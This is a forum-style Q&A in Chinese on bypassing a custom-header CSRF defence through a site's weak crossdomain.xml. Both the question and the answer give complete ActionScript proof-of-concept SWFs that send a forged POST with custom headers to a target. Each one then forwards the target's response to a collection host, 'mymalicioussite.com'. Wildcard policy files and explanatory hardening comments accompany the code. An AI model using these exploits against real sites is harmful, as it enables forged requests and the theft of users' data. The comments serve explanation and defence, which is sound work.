通过弱CrossDomain.xml使用ActionScript绕过CSRF
我有一个目标,它的CrossDomain.xml很弱,但它通过检查某个自定义HTTP头来阻止CSRF攻击。我在几个网站上发现了下面的ActionScript,除了没有设置请求头之外,它工作得非常好。此ActionScript向“Target.htm”发送POST请求,我需要它设置任意自定义头,例如 Test-Header:
标签:actionscript, csrf, actionscript-2, crossdomain.xml
package {
import flash.display.Sprite;
import flash.events.*;
import flash.net.URLRequestMethod;
import flash.net.URLRequest;
import flash.net.URLLoader;
import flash.net.URLVariables;
import flash.net.URLRequestHeader;
/**
 * Proof-of-concept SWF from the question. It issues a cross-domain POST to
 * the target page with one custom request header, then forwards whatever
 * response body it receives to a second host.
 *
 * NOTE(review): the asker reports that the custom header is NOT sent by this
 * version. The answer further down the page changes two things at once: it
 * assigns a new array to requestHeaders instead of pushing onto it, and it
 * adds allow-http-request-headers-from to the policy. Which change matters
 * cannot be told from this listing alone.
 */
public class FlashTest extends Sprite {
/**
 * Builds the POST request to the target and starts loading it.
 * eventHandler runs only if the load completes.
 */
public function FlashTest() {
// Header that the target's CSRF check is said to look for (asker's test name and value).
var header:URLRequestHeader = new URLRequestHeader("Test-Header", "Test123");
// Target URL (plain http on a private lab address).
var readFrom:String = "http://192.168.100.4/Target.htm";
var readRequest:URLRequest = new URLRequest(readFrom);
// The body content is irrelevant to the test; it only needs to be non-empty POST data.
readRequest.data = "ThisDoesNotMatter"
readRequest.method = URLRequestMethod.POST
// Appends the custom header to the request's existing header array.
readRequest.requestHeaders.push(header);
var getLoader:URLLoader = new URLLoader();
// Only COMPLETE is handled. No listener is registered for I/O or security
// error events, so a refusal by the cross-domain policy is not reported.
getLoader.addEventListener(Event.COMPLETE, eventHandler);
try
{
getLoader.load(readRequest);
}
catch(error:Error)
{
// Synchronous errors from load() are swallowed silently.
}
}
/**
 * COMPLETE handler: POSTs the response body read from the target to a second
 * host. This is the cross-origin read that a wildcard allow-access-from
 * policy on the target permits; a policy limited to trusted domains would
 * presumably stop the response from reaching this handler (confirm against
 * the Flash Player policy rules).
 *
 * @param event Completion event; event.target.data holds the loaded response.
 */
private function eventHandler(event:Event):void
{
// Collection endpoint (placeholder host name used by the asker).
var sendTO:String = "http://mymalicioussite.com";
var sendRequest:URLRequest = new URLRequest(sendTO);
sendRequest.method = URLRequestMethod.POST;
// The target's response is forwarded unchanged as the POST body.
sendRequest.data = event.target.data;
var sendLoader:URLLoader = new URLLoader();
try
{
sendLoader.load(sendRequest);
}
catch(error:Error)
{
// Synchronous errors from load() are swallowed silently.
}
}
}
}
目标上的CrossDomain.XML:
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<!-- domain="*" grants SWF content from any origin read access to this host's responses.
     That turns a blind CSRF into a cross-origin read. Hardening: list only the specific
     trusted domains. -->
<!-- NOTE(review): the listing above requests the target over plain http. The secure
     attribute is documented as applying to HTTPS policy files, so secure="true" likely
     restricts nothing here; confirm against the Adobe policy file specification. -->
<!-- This policy has no allow-http-request-headers-from element. That is consistent with
     the asker's custom header not being sent. -->
<allow-access-from domain="*" secure="true" />
</cross-domain-policy>
任何帮助都将不胜感激。
当目标同时接受GET和POST请求时,使用GET请求代替POST的代码也同样可行。据我所知,只有POST请求才允许设置自定义头,但带有标准HTTP头的GET请求至少目前对我是可行的。经过一些测试,我已能修改上述脚本来设置任意自定义头(浏览器不允许设置的Referer和User-Agent头除外)。此外,仅当目标和攻击机器都具有以下crossdomain.xml时,此方法才有效:
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<!-- Any origin may read responses from this host. secure="false" additionally lets content
     loaded over plain http access it. -->
<allow-access-from domain="*" secure="false" />
<!-- Any origin may attach any header name the player permits. A CSRF defence that relies on
     the presence of a custom request header is void while this line is in the policy.
     Hardening: drop the wildcards and name only the trusted domains and the specific
     headers they need, or remove the element entirely. -->
<allow-http-request-headers-from domain="*" headers="*" secure="false"/>
</cross-domain-policy>
package {
import flash.display.Sprite;
import flash.events.*;
import flash.net.URLRequestMethod;
import flash.net.URLRequest;
import flash.net.URLLoader;
import flash.net.URLVariables;
import flash.net.URLRequestHeader;
/**
 * Revised proof-of-concept from the answer. It does the same as the question's
 * listing (POST to the target, then forward the response body to a second
 * host), but assigns the header array to requestHeaders instead of pushing
 * onto it.
 *
 * The answer states that this works only when the policy file also carries
 * allow-http-request-headers-from with wildcards. The precondition is
 * therefore a server-side misconfiguration, and restricting that policy
 * element is the corresponding fix.
 */
public class FlashTest extends Sprite {
/**
 * Builds the POST request with the custom header and starts loading it.
 * eventHandler runs only if the load completes.
 */
public function FlashTest() {
// write as3 code here..
//Set Header
var headers:Array = [new URLRequestHeader("TestHeader", "Test123")];
//Target URL
var readFrom:String = "http://192.168.253.133/Target.htm";
var readRequest:URLRequest = new URLRequest(readFrom);
// Replaces the request's whole header array rather than appending to it.
readRequest.requestHeaders = headers;
readRequest.data = "ThisDoesNotMatter" //POST data
readRequest.method = URLRequestMethod.POST
// Left over from the earlier version, which pushed onto requestHeaders.
//readRequest.requestHeaders.push();
var getLoader:URLLoader = new URLLoader();
// Only COMPLETE is handled. No listener is registered for I/O or security
// error events, so a refusal by the cross-domain policy is not reported.
getLoader.addEventListener(Event.COMPLETE, eventHandler);
try
{
getLoader.load(readRequest);
}
catch(error:Error)
{
// Synchronous errors from load() are swallowed silently.
}
}
/**
 * COMPLETE handler: POSTs the response body read from the target to a second
 * host. Reading the response cross-origin depends on the target's
 * allow-access-from entry covering the origin that serves this SWF.
 *
 * @param event Completion event; event.target.data holds the loaded response.
 */
private function eventHandler(event:Event):void
{
// Collection endpoint (placeholder host name used by the author).
var sendTO:String = "http://mymalicioussite.com";
var sendRequest:URLRequest = new URLRequest(sendTO);
sendRequest.method = URLRequestMethod.POST;
// The target's response is forwarded unchanged as the POST body.
sendRequest.data = event.target.data;
var sendLoader:URLLoader = new URLLoader();
try
{
sendLoader.load(sendRequest);
}
catch(error:Error)
{
// Synchronous errors from load() are swallowed silently.
}
}
}
}//package